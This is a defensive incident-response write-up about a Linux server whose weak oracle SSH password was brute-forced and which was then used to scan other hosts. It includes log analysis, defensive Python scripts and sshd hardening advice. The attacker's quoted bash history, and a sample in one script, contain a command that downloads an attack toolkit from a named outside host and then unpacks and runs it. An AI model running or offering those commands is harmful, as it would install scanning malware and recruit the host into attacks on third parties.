A hands-on investigation after a server was compromised and turned into a zombie ("肉鸡")

2021-02-03    Category: Website Development

1. It started with the firewall collapsing

Before I had even reached the office today I got a phone call: the office could not connect to the internet properly, the network was extremely slow, and web pages would not load. I rushed to the office and started looking for the problem.

I first ruled out a switch failure, because the internal LAN was working normally. Pinging the firewall appliance showed severe packet loss. Clearly the firewall was in trouble and could not cope; its web management interface could not be logged into at all. I immediately contacted the vendor to troubleshoot remotely, and after nearly 3 hours of analysis the conclusion was that two hosts on the internal network

Host A is configured as follows:

  1. OS - RedHat Enterprise Linux Server release 6.x
  2. Deployed software - Tomcat, sshd, oracle
  3. RAM - 8GB
  4. CPU - Intel Core i3-2130
  5. IP address - 172.16.111.22

Host B is a customer's colocated host; its exact configuration is not known.

This article analyzes and handles host A only.

A packet capture taken from the firewall's command-line interface showed host A frantically scanning port 22 on a block of IP addresses. Below is a fragment of the capture:

    proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:39895=====>183.58.99.130:22, packet=3, bytes=208[REPLY] 183.58.99.130:22=====>59.46.161.39:39895, packet=0, bytes=0
    proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:33967=====>183.58.99.131:22, packet=3, bytes=208[REPLY] 183.58.99.131:22=====>59.46.161.39:33967, packet=0, bytes=0
    proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:34117=====>183.58.99.132:22, packet=3, bytes=208[REPLY] 183.58.99.132:22=====>59.46.161.39:34117, packet=0, bytes=0
    proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:54932=====>183.58.99.125:22, packet=3, bytes=208[REPLY] 183.58.99.125:22=====>59.46.161.39:54932, packet=0, bytes=0
    proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:60333=====>183.58.99.135:22, packet=3, bytes=208[REPLY] 183.58.99.135:22=====>59.46.161.39:60333, packet=0, bytes=0
    proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:52737=====>183.58.99.136:22, packet=3, bytes=208[REPLY] 183.58.99.136:22=====>59.46.161.39:52737, packet=0, bytes=0
    proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:52291=====>183.58.99.137:22, packet=3, bytes=208[REPLY] 183.58.99.137:22=====>59.46.161.39:52291, packet=0, bytes=0
    proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:46183=====>183.58.99.138:22, packet=3, bytes=208[REPLY] 183.58.99.138:22=====>59.46.161.39:46183, packet=0, bytes=0
    proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:36864=====>183.58.99.139:22, packet=3, bytes=208[REPLY] 183.58.99.139:22=====>59.46.161.39:36864, packet=0, bytes=0
    proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:34515=====>183.58.99.133:22, packet=3, bytes=208[REPLY] 183.58.99.133:22=====>59.46.161.39:34515, packet=0, bytes=0
    proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:57121=====>183.58.99.134:22, packet=3, bytes=208[REPLY] 183.58.99.134:22=====>59.46.161.39:57121, packet=0, bytes=0
    proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:37830=====>183.58.99.140:22, packet=3, bytes=208[REPLY] 183.58.99.140:22=====>59.46.161.39:37830, packet=0, bytes=0
    proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:42742=====>183.58.99.141:22, packet=3, bytes=208[REPLY] 183.58.99.141:22=====>59.46.161.39:42742, packet=0, bytes=0
    proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:55018=====>183.58.99.142:22, packet=3, bytes=208[REPLY] 183.58.99.142:22=====>59.46.161.39:55018, packet=0, bytes=0
    proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:46447=====>183.58.99.143:22, packet=3, bytes=208[REPLY] 183.58.99.143:22=====>59.46.161.39:46447, packet=0, bytes=0
    proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:51039=====>183.58.99.147:22, packet=3, bytes=208[REPLY] 183.58.99.147:22=====>59.46.161.39:51039, packet=0, bytes=0
    proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:33123=====>183.58.99.146:22, packet=3, bytes=208[REPLY] 183.58.99.146:22=====>59.46.161.39:33123, packet=0, bytes=0
    proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:35956=====>183.58.99.151:22, packet=3, bytes=208[REPLY] 183.58.99.151:22=====>59.46.161.39:35956, packet=0, bytes=0
    proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:45002=====>183.58.99.145:22, packet=3, bytes=208[REPLY] 183.58.99.145:22=====>59.46.161.39:45002, packet=0, bytes=0
    proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:54711=====>183.58.99.150:22, packet=3, bytes=208[REPLY] 183.58.99.150:22=====>59.46.161.39:54711, packet=0, bytes=0
    proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:58976=====>183.58.99.155:22, packet=3, bytes=208[REPLY] 183.58.99.155:22=====>59.46.161.39:58976, packet=0, bytes=0
    proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:37967=====>183.58.99.157:22, packet=3, bytes=208[REPLY] 183.58.99.157:22=====>59.46.161.39:37967, packet=0, bytes=0
    proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:47125=====>183.58.99.158:22, packet=3, bytes=208[REPLY] 183.58.99.158:22=====>59.46.161.39:47125, packet=0, bytes=0
    proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:35028=====>183.58.99.156:22, packet=3, bytes=208[REPLY] 183.58.99.156:22=====>59.46.161.39:35028, packet=0, bytes=0

You can clearly see the zombie's scanner sweeping port 22 across an entire network segment.
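Spotting the scanner in a session table like this can be automated. The Python script below is an added example and not part of the original article: it parses records in the firewall's format shown above and flags any source that has opened sessions to many distinct destinations on the same port, counting how many of those sessions got zero reply packets (every record above shows packet=3 forward and packet=0 back, i.e. connection attempts nobody answered, which is what fills a firewall's session table without any useful traffic flowing). The session lines embedded in it are constructed to match that format, and the `min_targets` threshold is an assumption to tune for your own network.

```python
import re
from collections import defaultdict

# Constructed sample in the firewall's session-table format quoted in the article:
# six sessions from one source sweeping port 22, plus one ordinary HTTPS session.
SAMPLE_SESSIONS = """\
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:39895=====>183.58.99.130:22, packet=3, bytes=208[REPLY] 183.58.99.130:22=====>59.46.161.39:39895, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:33967=====>183.58.99.131:22, packet=3, bytes=208[REPLY] 183.58.99.131:22=====>59.46.161.39:33967, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:34117=====>183.58.99.132:22, packet=3, bytes=208[REPLY] 183.58.99.132:22=====>59.46.161.39:34117, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:54932=====>183.58.99.125:22, packet=3, bytes=208[REPLY] 183.58.99.125:22=====>59.46.161.39:54932, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:60333=====>183.58.99.135:22, packet=3, bytes=208[REPLY] 183.58.99.135:22=====>59.46.161.39:60333, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:52737=====>183.58.99.136:22, packet=3, bytes=208[REPLY] 183.58.99.136:22=====>59.46.161.39:52737, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.50:40001=====>203.0.113.10:443, packet=12, bytes=4096[REPLY] 203.0.113.10:443=====>59.46.161.39:40001, packet=10, bytes=20480
"""

# One session record: the forward half, then the [REPLY] half with its own counters.
SESSION_RE = re.compile(
    r"(?P<src>\d+\.\d+\.\d+\.\d+):(?P<sport>\d+)=====>"
    r"(?P<dst>\d+\.\d+\.\d+\.\d+):(?P<dport>\d+),\s*"
    r"packet=(?P<fwd_pkts>\d+),\s*bytes=(?P<fwd_bytes>\d+)"
    r"\[REPLY\]\s*\S+=====>\S+,\s*"
    r"packet=(?P<rev_pkts>\d+),\s*bytes=(?P<rev_bytes>\d+)"
)


def parse_session(line):
    """Return endpoints and packet counters of one record, or None if the line is not a session."""
    m = SESSION_RE.search(line)
    if not m:
        return None
    d = m.groupdict()
    return {
        "src": d["src"], "sport": int(d["sport"]),
        "dst": d["dst"], "dport": int(d["dport"]),
        "fwd_pkts": int(d["fwd_pkts"]), "rev_pkts": int(d["rev_pkts"]),
    }


def find_scanners(session_text, min_targets=5):
    """Group sessions by (source IP, destination port) and flag groups that fan out to at
    least min_targets distinct destinations. 'unanswered' counts sessions with zero reply
    packets: a sweep of hosts that never answer occupies session-table slots for nothing."""
    targets = defaultdict(set)
    unanswered = defaultdict(int)
    for line in session_text.splitlines():
        s = parse_session(line)
        if s is None:
            continue
        key = (s["src"], s["dport"])
        targets[key].add(s["dst"])
        if s["rev_pkts"] == 0:
            unanswered[key] += 1
    alerts = []
    for (src, dport), dsts in sorted(targets.items()):
        if len(dsts) >= min_targets:
            alerts.append({
                "src": src, "dport": dport,
                "targets": len(dsts), "unanswered": unanswered[(src, dport)],
                # /24 blocks touched, to see at a glance that a whole segment is being swept
                "networks": sorted({d.rsplit(".", 1)[0] + ".0/24" for d in dsts}),
            })
    return alerts


if __name__ == "__main__":
    for a in find_scanners(SAMPLE_SESSIONS):
        print(f"{a['src']} -> port {a['dport']}: {a['targets']} hosts in {a['networks']}, "
              f"{a['unanswered']} sessions with no reply")
```

Run against a full session dump, the single source with a large fan-out on port 22 and near-zero reply traffic is the host to pull off the network first; the HTTPS session in the sample shows that an ordinary connection with real reply traffic is not flagged.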

2. How to look for the attacker's tracks

On a Linux host, logs are the main basis for analysis and handling after an incident. /var/log/messages and /var/log/secure are indispensable targets, followed by the .bash_history command records. An attacker who logs into the host inevitably leaves entries in the logs; a skilled attacker might erase those traces, but most attackers today are opportunists using ready-made tools without much technical background. This host exposes three TCP listening ports:

  1. 22 sshd
  2. 80 Tomcat
  3. 1521 Oracle

Any of these three services could have a vulnerability that gets attacked, but the most common way in via scanning is still brute-forcing the sshd username and password. So I analyzed /var/log/secure first, to look at the login history.

3. Analysis of the compromise

3.1 The oracle user's password was cracked

Analyzing /var/log/secure. I had no idea until I looked, and it was a shock: the log already filled four files, each recording a huge number of login attempts. I ran:

    cat secure-20150317 | grep 'Failed password' | cut -d " " -f 9,10,11 | sort | uniq

The result was:

    invalid user admin
    invalid user dacx
    invalid user details3
    invalid user drishti
    invalid user ferreluque
    invalid user git
    invalid user hall
    invalid user jparksu
    invalid user last
    invalid user patrol
    invalid user paul
    invalid user pgadmin
    invalid user postgres
    invalid user public
    invalid user sauser
    invalid user siginspect
    invalid user sql
    invalid user support
    invalid user sys
    invalid user sysadmin
    invalid user system
    invalid user taz
    invalid user test
    invalid user tiptop
    invalid user txl5460
    invalid user ubnt
    invalid user www
    mysql from 10.10.10.1
    oracle from 10.10.10.1
    root from 10.10.10.1

You can see the attack program kept trying different accounts and passwords. Then, near the end, I found the following 2 lines, which show the host had been broken into.

    Mar 9 20:35:30 localhost sshd[30379]: Accepted password for oracle from 10.10.10.1 port 56906 ssh2
    Mar 9 20:35:30 localhost sshd[30379]: pam_unix(sshd:session): session opened for user oracle by (uid=0)

So the oracle account's password was guessed and the attacker logged in successfully.
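The cut | sort | uniq one-liner above shows which usernames were tried; the Python script below is an added example (not from the article) that carries the same triage further over sample /var/log/secure lines. It parses the Failed and Accepted sshd records, counts failures per source and lists the usernames tried, and then flags any Accepted login from a source that had already failed at least `min_failures` times, which is exactly the "many failures, then one success" pattern found at the end of this log. The log lines embedded in it are constructed in the format quoted above (the real log held far more), and `min_failures` is an assumed threshold.

```python
import re
from collections import Counter

# Constructed sample in the /var/log/secure format quoted in the article.
SAMPLE_SECURE = """\
Mar  9 20:31:02 localhost sshd[30301]: Failed password for invalid user admin from 10.10.10.1 port 50001 ssh2
Mar  9 20:31:05 localhost sshd[30303]: Failed password for invalid user postgres from 10.10.10.1 port 50002 ssh2
Mar  9 20:31:09 localhost sshd[30305]: Failed password for root from 10.10.10.1 port 50003 ssh2
Mar  9 20:33:14 localhost sshd[30340]: Failed password for oracle from 10.10.10.1 port 50004 ssh2
Mar  9 20:33:20 localhost sshd[30342]: Failed password for oracle from 10.10.10.1 port 50005 ssh2
Mar  9 20:35:30 localhost sshd[30379]: Accepted password for oracle from 10.10.10.1 port 56906 ssh2
Mar  9 20:35:30 localhost sshd[30379]: pam_unix(sshd:session): session opened for user oracle by (uid=0)
Mar  9 21:02:11 localhost sshd[30511]: Accepted publickey for deploy from 172.16.111.5 port 41000 ssh2
"""

# sshd authentication records: "Failed password for [invalid user] NAME from IP port N ssh2"
# and "Accepted password|publickey for NAME from IP port N ssh2". Other lines are ignored.
AUTH_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2}\s+\d\d:\d\d:\d\d)\s+\S+\s+sshd\[\d+\]:\s+"
    r"(?P<outcome>Accepted|Failed)\s+(?P<method>\S+)\s+for\s+"
    r"(?:(?P<invalid>invalid user)\s+)?(?P<user>\S+)\s+from\s+"
    r"(?P<src>\d+\.\d+\.\d+\.\d+)\s+port\s+(?P<port>\d+)"
)


def parse_auth_events(text):
    """Return the authentication records in log order as dicts; non-auth lines are skipped."""
    events = []
    for line in text.splitlines():
        m = AUTH_RE.match(line)
        if m:
            e = m.groupdict()
            e["invalid"] = e["invalid"] is not None   # True when the username does not exist
            e["port"] = int(e["port"])
            events.append(e)
    return events


def failures_by_source(events):
    """How many failed attempts each source address made."""
    return Counter(e["src"] for e in events if e["outcome"] == "Failed")


def usernames_tried(events):
    """Same information as the article's cut | sort | uniq: sorted (username, nonexistent?) pairs."""
    return sorted({(e["user"], e["invalid"]) for e in events if e["outcome"] == "Failed"})


def suspicious_logins(events, min_failures=3):
    """Walk the log in order. An Accepted login from a source that had already failed
    min_failures times or more is a likely brute-force success, whatever the method."""
    failed_so_far = Counter()
    hits = []
    for e in events:
        if e["outcome"] == "Failed":
            failed_so_far[e["src"]] += 1
        elif failed_so_far[e["src"]] >= min_failures:
            hits.append({"ts": e["ts"], "user": e["user"], "src": e["src"],
                         "method": e["method"], "prior_failures": failed_so_far[e["src"]]})
    return hits


if __name__ == "__main__":
    events = parse_auth_events(SAMPLE_SECURE)
    print("failures per source:", dict(failures_by_source(events)))
    print("usernames tried:", [u for u, _ in usernames_tried(events)])
    for h in suspicious_logins(events):
        print(f"{h['ts']}: {h['user']} from {h['src']} accepted via {h['method']} "
              f"after {h['prior_failures']} failures")
```

On the real host this is run over all four rotated secure files concatenated in date order, so the failure counts seen before each Accepted line are complete; the publickey login in the sample is not flagged because nothing failed from its source first.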

3.2 Reconstructing the attacker's actions

Now let's see what the attacker did with the oracle account. First, copy oracle's command history so that later operations cannot lose the record.

    cp /home/oracle/.bash_history hacker_history

Then examine and analyze this file. I have noted the attacker's intent in parentheses after the commands.

    vi .bash_profile
    vi .bash_profile (view .bash_profile, check the variable settings, add /home/oracle/bin to PATH)
    ll
    cd /
    vi .bash_profile
    vi .bash_profile (apply it, set environment variables)
    w
    ps x (view running processes)
    free -m (check memory size)
    uname -a (check the system version)
    cat /etc/issue (check the distribution)
    cat /etc/hosts (check whether there are other hosts on the internal network)
    cat /proc/cpuinfo (check the CPU model)
    cat .bash_history (view the oracle account's past commands)
    w (check system load)
    ls -a (view hidden files under /home/oracle/)
    passwd (change the oracle account's password)
    exit
    ls
    oracle
    sqlplus (run sqlplus)
    su (try to switch to the root account)
    app1123456 (a guess at the root password)
    ls
    su -
    w
    free -m
    php -v (check the php version)
    exit
    w
    free -m
    php -v
    ps aux
    ls -a
    exit
    w
    free -m
    php -v
    cat bash_his (view the command history)
    cat bash_history
    cat .bash_history
    wget scriptcoders.ucoz.com/piata.tgz (download the zombie attack toolkit)
    tar zxvf piata.tgz (unpack the package)
    rm -rf piata.tgz (delete the package)
    cd piata/ (change into the attack tool directory)
    ls -a
    chmod +x *
    ./a 210.212 (run the attack tool)
    screen (try to run screen; it is not installed, so download it)
    ls -a
    wget scriptcoders.ucoz.com/screen.tgz
    tar zxvf screen.tgz (unpack)
    ./screen
    exit
    w
    ps x
    cd piata/ (change into the attack tool directory)
    ls -a
    cat vuln.txt (view the attack results)
    ls -a
    mv vuln.txt 1.txt (save the attack results)
    ./screen -r
    nano 1.txt (view the results file)
    w
    ps x
    exit
    cd piata
    ps x
    ls -a
    nano 2.txt
    exit
    w
    ps x
    cd piata/
    ls -a
    cat
    mv vuln.txt 2.txt (save results)
    nano 2.txt
    w
    ps x
    cd piata/
    ls- a
    cat vuln.txt
    rm -rf vuln.txt
    ./screen -r
    exit
    w
    ps x
    cd piata/
    ls -a
    cat vuln.txt
    ls -a
    mv vuln.txt 3.txt (save results)
    nano 3.txt
    exit
    w
    ps x
    cd piata/
    ls -a
    cat vuln.txt
    rm -rf vuln.txt
    exit
    w
    ps x
    cd piata/
    ls -a
    cat vuln.txt
    rm -rf vuln.txt
    rm -rf 1.txt
    rm -rf 2.txt
    rm -rf 2.txt.save
    rm -rf 3.txt
    screen -r
    ./screen -r
    exit
    w
    ps x
    cd piata/
    ls -a
    cat vuln.txt
    ls -a
    nano vuln.txt
    rm -rf vuln.txt
    screen -r
    ./screen -r
    exit
    w
    ps x
    cd piata/
    ls -a
    cat vuln.txt
    nano vuln.txt
    w
    ls -a
    rm -rf vuln.txt
    screen -r
    ./screen -r
    exit
    w
    ps x
    cd piata/
    ls -a
    cat vuln.txt
    rm -rf vuln.txt
    ps x
    ls -a
    ./screen -r
    exit
    w
    ps x
    cd piata/
    ls -a
    cat vuln.txt
    nano vuln.txt
    w
    rm -rf vuln.txt
    ./screen -r
    exit
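Reading 158 lines of history by hand works once; the Python script below is an added example, not part of the article, that automates the two steps of this section. It preserves the history file the way the cp command above does, but also records a SHA-256 digest so the copy can later be shown to match the original, and it tags each command with the kind of activity a responder looks for (reconnaissance, reading history, credential changes, privilege-escalation attempts, tool download, unpacking, making files executable, running local binaries, cleanup), extracting the hosts named in download commands as indicators to block and search for. The sample history embedded in it is a condensed, constructed version of the commands quoted above; the tag rules and the recon command/file lists are my own and not exhaustive.

```python
import hashlib
import re
import shutil
import tempfile
from pathlib import Path

# Constructed sample: a condensed version of the attacker's history quoted above.
SAMPLE_HISTORY = """\
w
uname -a
cat /etc/hosts
cat .bash_history
passwd
su
wget scriptcoders.ucoz.com/piata.tgz
tar zxvf piata.tgz
rm -rf piata.tgz
chmod +x *
./a 210.212
rm -rf vuln.txt
"""

# Commands and files that characterise host reconnaissance (my own, non-exhaustive list).
RECON_CMDS = {"w", "who", "ps", "uname", "free", "id", "hostname", "last", "netstat"}
RECON_FILES = {"/etc/issue", "/etc/hosts", "/etc/passwd", "/etc/redhat-release", "/proc/cpuinfo"}


def tag_command(cmd):
    """Return the set of activity tags for one history line (empty for neutral commands)."""
    argv = cmd.split()
    if not argv:
        return set()
    prog, args = argv[0], argv[1:]
    tags = set()
    if prog in RECON_CMDS or (prog == "cat" and any(a in RECON_FILES for a in args)):
        tags.add("recon")
    if prog == "cat" and any(a.endswith(("bash_history", "bash_his")) for a in args):
        tags.add("history-read")
    if prog == "passwd":
        tags.add("cred-change")
    if prog in ("su", "sudo"):
        tags.add("priv-esc")
    if prog in ("wget", "curl"):
        tags.add("download")
    if prog == "tar" and args and "x" in args[0].lstrip("-"):
        tags.add("extract")
    if prog == "chmod" and args and "x" in args[0]:   # symbolic +x only; numeric modes not modelled
        tags.add("make-exec")
    if prog.startswith("./"):
        tags.add("run-local")
    if prog == "rm":
        tags.add("cleanup")
    return tags


def triage_history(text):
    """Return (findings, hosts): findings = [(line_no, command, sorted tags)] for every tagged
    command; hosts = sorted hosts named in download commands (indicators to block and search)."""
    findings, hosts = [], set()
    for n, cmd in enumerate(text.splitlines(), 1):
        tags = tag_command(cmd)
        if tags:
            findings.append((n, cmd, sorted(tags)))
        if "download" in tags:
            for arg in cmd.split()[1:]:
                if not arg.startswith("-"):
                    hosts.add(re.sub(r"^[a-z]+://", "", arg).split("/")[0])
    return findings, sorted(hosts)


def phase_summary(findings):
    """Tags in order of first appearance: a rough timeline of the intrusion."""
    seen = []
    for _, _, tags in findings:
        for t in tags:
            if t not in seen:
                seen.append(t)
    return seen


def preserve_file(src, dst):
    """Copy src to dst keeping timestamps; return the copy's SHA-256 after checking it matches."""
    src, dst = Path(src), Path(dst)
    shutil.copy2(src, dst)
    digest = hashlib.sha256(dst.read_bytes()).hexdigest()
    if digest != hashlib.sha256(src.read_bytes()).hexdigest():
        raise RuntimeError("copy does not match original")
    return digest


def preserve_demo():
    """Round-trip the sample history through preserve_file in a temporary directory."""
    with tempfile.TemporaryDirectory() as tmp:
        src = Path(tmp) / ".bash_history"
        src.write_text(SAMPLE_HISTORY)
        digest = preserve_file(src, Path(tmp) / "hacker_history")
    return digest == hashlib.sha256(SAMPLE_HISTORY.encode()).hexdigest()


if __name__ == "__main__":
    findings, hosts = triage_history(SAMPLE_HISTORY)
    for n, cmd, tags in findings:
        print(f"{n:4d}  {','.join(tags):14s}  {cmd}")
    print("download hosts:", hosts)
    print("timeline:", " -> ".join(phase_summary(findings)))
```

Copying the history before doing anything else matters because the account's own shell appends to it on logout; in this case the attacker also changed the oracle password with passwd, so the cred-change tag is the line that tells you the account needs to be reset and every other account checked for the same guessable pattern.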

3.3 A look at the attack tools

From the command history above, the attack toolkit package is named piata. Let's pull it down and take a look at it.

    [root@localhost piata]# ll
    total 1708
    -rw-r--r--. 1 oracle oinstall 0 Mar 10 13:01 183.63.pscan.22
    -rwxr-xr-x. 1 oracle oinstall 659 Feb 2 2008 a
    -rwxr-xr-x. 1 oracle oinstall 216 May 18 2005 auto
    -rwxr-xr-x. 1 oracle oinstall 283 Nov 25 2004 gen-pass.sh
    -rwxr-xr-x. 1 oracle oinstall 93 Apr 19 2005 go.sh
    -rwxr-xr-x. 1 oracle oinstall 3253 Mar 5 2007 mass
    -rwxr-xr-x. 1 oracle oinstall 12671 May 18 2008 pass_file
    -rwxr-xr-x. 1 oracle oinstall 21407 Jul 22 2004 pscan2
    -rwxr-xr-x. 1 oracle oinstall 249980 Feb 13 2001 screen
    -rw-r--r--. 1 oracle oinstall 130892 Feb 3 2010 screen.tgz
    -rwxr-xr-x. 1 oracle oinstall 453972 Jul 13 2004 ss
    -rwxr-xr-x. 1 oracle oinstall 842736 Nov 24 2004 ssh-scan
    -rw-r--r--. 1 oracle oinstall 2392 Mar 10 05:03 vuln.txt

Of these, a, auto, go.sh and gen-pass.sh are bash scripts used to configure the network ranges to scan and to invoke the scanner programs. pscan2 and ssh-scan are the scanners themselves. vuln.txt records the list of zombies obtained.

So far no other system files have been found modified by the attacker, and there is no configuration that runs the attack software automatically.

4. Hard lessons

Although the attacked machine was only a test host of little importance in itself, it still brought down the firewall and in turn cut off internet access. This must be taken seriously, and lessons must be drawn from it.

System account passwords must have a certain complexity. This attack happened because the oracle account's password was far too simple.

Password login over sshd is very risky, especially when the password is simple. Wherever feasible, disable password authentication and switch to public-key authentication.

As a data center administrator, you must supervise and oversee the service security of your system administrators and software vendors. In this case, all privileges on the attacked host had been handed over to the website development company, and that company paid no attention to operational security.
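The sshd lesson above comes down to a few sshd_config directives, and checking them by eye is error-prone because sshd uses the first uncommented occurrence of a keyword and treats commented-out lines as documentation of the default, not as settings. The Python script below is an added example, not from the article: it computes the effective value of the directives that matter here, reports which are still weak, and writes a hardened version of the file. The weak config embedded in it is constructed; the defaults table reflects OpenSSH's documented built-in defaults and the target values are my recommendation. It does not model Match blocks, so confirm the result on the real host with `sshd -T`, and install and test the public keys before disabling password authentication so you do not lock yourself out.

```python
import re

# OpenSSH's built-in defaults for the directives audited here (see sshd_config(5);
# verify on the real host with `sshd -T`). A commented-out line only shows the default.
DEFAULTS = {
    "passwordauthentication": "yes",
    "pubkeyauthentication": "yes",
    "permitrootlogin": "yes",
}
# Target values: key-based logins only, and no direct root login over ssh.
WANTED = {
    "passwordauthentication": "no",
    "pubkeyauthentication": "yes",
    "permitrootlogin": "no",
}
CANONICAL = {
    "passwordauthentication": "PasswordAuthentication",
    "pubkeyauthentication": "PubkeyAuthentication",
    "permitrootlogin": "PermitRootLogin",
}

# Constructed sshd_config fragment with password logins left enabled.
WEAK_CONFIG = """\
# sshd_config (constructed example)
Port 22
Protocol 2
#PasswordAuthentication no
PasswordAuthentication yes
PermitRootLogin yes
UsePAM yes
"""


def _directive(raw):
    """Split an active config line into (lowercased keyword, value); None for blanks and comments."""
    line = raw.strip()
    if not line or line.startswith("#"):
        return None
    parts = re.split(r"[\s=]+", line, maxsplit=1)
    if len(parts) != 2:
        return None
    return parts[0].lower(), parts[1].strip()


def effective_settings(config_text):
    """For each audited keyword, the first active occurrence wins (sshd semantics), else the default."""
    settings = dict(DEFAULTS)
    seen = set()
    for raw in config_text.splitlines():
        d = _directive(raw)
        if d and d[0] in settings and d[0] not in seen:
            settings[d[0]] = d[1].lower()
            seen.add(d[0])
    return settings


def audit_sshd_config(config_text):
    """List (directive, effective value, wanted value) for every directive not at its target."""
    eff = effective_settings(config_text)
    return [(CANONICAL[k], eff[k], WANTED[k]) for k in WANTED if eff[k] != WANTED[k]]


def harden_sshd_config(config_text):
    """Rewrite the first active occurrence of each audited keyword to its target value,
    comment out later duplicates (sshd ignores them, but they mislead whoever reads the
    file next), and append any audited keyword the file does not set at all."""
    out, done = [], set()
    for raw in config_text.splitlines():
        d = _directive(raw)
        if d and d[0] in WANTED:
            if d[0] in done:
                out.append("#" + raw + "   # duplicate, ignored by sshd")
            else:
                out.append(f"{CANONICAL[d[0]]} {WANTED[d[0]]}")
                done.add(d[0])
        else:
            out.append(raw)
    for k in WANTED:
        if k not in done:
            out.append(f"{CANONICAL[k]} {WANTED[k]}")
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    for name, actual, wanted in audit_sshd_config(WEAK_CONFIG):
        print(f"{name}: is {actual!r}, should be {wanted!r}")
    print(harden_sshd_config(WEAK_CONFIG))
```

Pair the hardened file with a test from a second terminal (`ssh -o PreferredAuthentications=password` should now be refused while the key login still works) before closing the session you changed it from; the same audit function can be run across every host's sshd_config to find the ones that still take passwords.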

本文標(biāo)題:一次服務(wù)器淪陷為肉雞后的實(shí)戰(zhàn)排查過(guò)程!
標(biāo)題路徑:http://www.muchs.cn/news9/99009.html
